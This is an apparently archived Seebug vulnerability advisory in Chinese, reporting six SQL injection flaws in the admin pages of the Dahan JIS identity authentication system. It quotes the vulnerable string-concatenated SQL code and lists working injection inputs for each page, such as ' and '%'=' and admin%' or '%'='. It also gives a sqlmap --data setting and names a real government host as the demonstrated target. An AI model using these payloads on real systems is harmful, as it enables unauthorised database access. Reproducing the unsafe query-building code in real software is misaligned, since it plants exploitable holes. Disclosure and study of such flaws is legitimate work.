Search...

大汉版通JIS统一身份认证系统系统多处SQL注入

2014-01-27T00:00:00

ID SSV:93880
Type seebug
Reporter Root
Modified 2014-01-27T00:00:00

Description

简要描述：

只是冲着数量来的。后台SQL注入，有点怀疑是实习程序员……临时工的作品？

详细说明：

后台SQL1 第一个先拿一个麻烦一点的来演示，后面的同理需要有应用管理员或者系统管理员的权限登录。 /jis/manage/datasbase/que_datasbase.jsp

if (que_keywords.length() > 0) { strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords + "%'"); }

为了配合工具利用，需要先新增监听管理： http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&

只要是公网可以访问的IP，而且用户名、密码是对的就行了。否则会提示无法连接之类的

添加了之后就有作为标识用的字符串出来了在搜索框内输入' and '%'=' 页面没有变化

输入' and '1'='，页面变化了

带上cookie丢工具吧 Sqlmap配置data的时候这样来比较好：--data "que_keywords=' * and '%'='"

后台SQL2 jis/manage/app/que_application.jsp

if (que_keywords.length() > 0) { strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords+ "%' OR vc_appmark LIKE '%" + que_keywords+ "%'"); }

权限要求同上照旧，搜索处输入' and '%'='

' and '1'='

工具利用方法类似上一个。后台SQL3 jis/sys/user/que_userginfo.jsp 类似上两个漏洞

if(que_keywords.length()>0) strSqlCondition.append(" AND vc_usergroupname like '%"+que_keywords+ "%' OR vc_groupallname like '%"+que_keywords+"%'");

搜索输入 ' and '%'=' 搜索出所有结果：

漏洞证明：

后台SQL4 jis/manage/role/que_approleinfo.jsp

if(que_keywords.length()>0) { strSqlCondition.append(" AND vc_rolename like '%"+que_keywords+"%'"); } if(que_webid.length()>0) { strSqlCondition.append(" AND i_webid = '"+que_webid+"'"); }

输入' and '%'='

' and '%'='1

后台SQL5 jis/manage/log/que_log.jsp

if(que_keywords.length()>0){ strSqlCondition.append(" AND vc_operatecontent like '%"+que_keywords+"%' OR c_userid like '%"+que_keywords+"%' OR vc_modulename like '%"+que_keywords+"%' OR vc_state like '%"+que_keywords+"%' "); }

搜索输入 admin%' or '%'=' 出来全部结果：

改为admin%' and '%'=' 则只出现admin的日志：

后台SQL6 jis/manage/sysview/que_sysview.jsp 输入fgj' or '%'='

JSON Vulners Source

Initial Source

{"sourceData": "", "status": "details", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u53ea\u662f\u51b2\u7740\u6570\u91cf\u6765\u7684\u3002\u540e\u53f0SQL\u6ce8\u5165\uff0c\u6709\u70b9\u6000\u7591\u662f\u5b9e\u4e60\u7a0b\u5e8f\u5458\u2026\u2026\u4e34\u65f6\u5de5\u7684\u4f5c\u54c1\uff1f\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n\u540e\u53f0SQL1\n\u7b2c\u4e00\u4e2a\u5148\u62ff\u4e00\u4e2a\u9ebb\u70e6\u4e00\u70b9\u7684\u6765\u6f14\u793a\uff0c\u540e\u9762\u7684\u540c\u7406\n\u9700\u8981\u6709\u5e94\u7528\u7ba1\u7406\u5458\u6216\u8005\u7cfb\u7edf\u7ba1\u7406\u5458\u7684\u6743\u9650\u767b\u5f55\u3002\n/jis/manage/datasbase/que_datasbase.jsp\n\n\n```\nif (que_keywords.length() > 0) {\n\t\tstrSqlCondition.append(\" AND vc_collocatename like '%\" + que_keywords\n\t\t+ \"%'\");\n\t}\n```\n\n\n\u4e3a\u4e86\u914d\u5408\u5de5\u5177\u5229\u7528\uff0c\u9700\u8981\u5148\u65b0\u589e\u76d1\u542c\u7ba1\u7406\uff1a\nhttp://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&\n\n\n[<img src=\"https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png\" alt=\"image025.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png)\n\n\n\u53ea\u8981\u662f\u516c\u7f51\u53ef\u4ee5\u8bbf\u95ee\u7684IP\uff0c\u800c\u4e14\u7528\u6237\u540d\u3001\u5bc6\u7801\u662f\u5bf9\u7684\u5c31\u884c\u4e86\u3002\u5426\u5219\u4f1a\u63d0\u793a\u65e0\u6cd5\u8fde\u63a5\u4e4b\u7c7b\u7684\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png\" alt=\"image027.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png)\n\n\n\u6dfb\u52a0\u4e86\u4e4b\u540e\u5c31\u6709\u4f5c\u4e3a\u6807\u8bc6\u7528\u7684\u5b57\u7b26\u4e32\u51fa\u6765\u4e86\n\u5728\u641c\u7d22\u6846\u5185\u8f93\u5165' and '%'='\n\u9875\u9762\u6ca1\u6709\u53d8\u5316\n\n\n[<img src=\"https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png\" alt=\"image029.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png)\n\n\n\u8f93\u5165' and '1'='\uff0c\u9875\u9762\u53d8\u5316\u4e86\n\n\n[<img src=\"https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png\" alt=\"image031.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png)\n\n\n\u5e26\u4e0acookie\u4e22\u5de5\u5177\u5427\nSqlmap\u914d\u7f6edata\u7684\u65f6\u5019\u8fd9\u6837\u6765\u6bd4\u8f83\u597d\uff1a--data \"que_keywords=' * and '%'='\"\n\n\n[<img src=\"https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png\" alt=\"image033.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png\" alt=\"image035.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png)\n\n\n\u540e\u53f0SQL2\njis/manage/app/que_application.jsp\n\n\n```\nif (que_keywords.length() > 0) {\n\t\tstrSqlCondition.append(\" AND vc_appname LIKE '%\" + que_keywords+ \"%' OR vc_appmark LIKE '%\" \n\t\t\t\t+ que_keywords+ \"%'\");\n\t}\n```\n\n\n\u6743\u9650\u8981\u6c42\u540c\u4e0a\n\u7167\u65e7\uff0c\u641c\u7d22\u5904\u8f93\u5165' and '%'='\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png\" alt=\"image037.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png)\n\n\n' and '1'='\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png\" alt=\"image039.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png)\n\n\n\u5de5\u5177\u5229\u7528\u65b9\u6cd5\u7c7b\u4f3c\u4e0a\u4e00\u4e2a\u3002\n\u540e\u53f0SQL3\njis/sys/user/que_userginfo.jsp\n\u7c7b\u4f3c\u4e0a\u4e24\u4e2a\u6f0f\u6d1e\n\n\n```\nif(que_keywords.length()>0)\n\t\tstrSqlCondition.append(\" AND vc_usergroupname like '%\"+que_keywords+\n\t\t\t\t\"%' OR vc_groupallname like '%\"+que_keywords+\"%'\");\n```\n\n\n\u641c\u7d22\u8f93\u5165\n' and '%'='\n\u641c\u7d22\u51fa\u6240\u6709\u7ed3\u679c\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png\" alt=\"image041.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png)\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\u540e\u53f0SQL4\njis/manage/role/que_approleinfo.jsp\n\n\n```\nif(que_keywords.length()>0) {\n\t\tstrSqlCondition.append(\" AND vc_rolename like '%\"+que_keywords+\"%'\");\n\t}\n\tif(que_webid.length()>0) {\n\t\tstrSqlCondition.append(\" AND i_webid = '\"+que_webid+\"'\");\n\t}\n```\n\n\n\u8f93\u5165' and '%'='\n\n\n[<img src=\"https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png\" alt=\"image043.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png)\n\n\n' and '%'='1\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png\" alt=\"image045.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png)\n\n\n\u540e\u53f0SQL5\njis/manage/log/que_log.jsp\n\n\n```\nif(que_keywords.length()>0){\n\t\tstrSqlCondition.append(\" AND vc_operatecontent like '%\"+que_keywords+\"%' OR c_userid like '%\"+que_keywords+\"%' OR vc_modulename like '%\"+que_keywords+\"%' OR vc_state like '%\"+que_keywords+\"%' \");\t\n\t}\n```\n\n\n\u641c\u7d22\u8f93\u5165\nadmin%' or '%'='\n\u51fa\u6765\u5168\u90e8\u7ed3\u679c\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png\" alt=\"image047.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png)\n\n\n\u6539\u4e3aadmin%' and '%'='\n\u5219\u53ea\u51fa\u73b0admin\u7684\u65e5\u5fd7\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png\" alt=\"image049.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png)\n\n\n\u540e\u53f0SQL6\njis/manage/sysview/que_sysview.jsp\n\u8f93\u5165fgj' or '%'='\n\n\n[<img src=\"https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png\" alt=\"image051.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png)", "sourceHref": "", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-93880", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T17:34:41", "published": "2014-01-27T00:00:00", "cvelist": [], "id": "SSV:93880", "enchantments_done": [], "modified": "2014-01-27T00:00:00", "title": "\u5927\u6c49\u7248\u901aJIS\u7edf\u4e00\u8eab\u4efd\u8ba4\u8bc1\u7cfb\u7edf\u7cfb\u7edf\u591a\u5904SQL\u6ce8\u5165", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645422314}}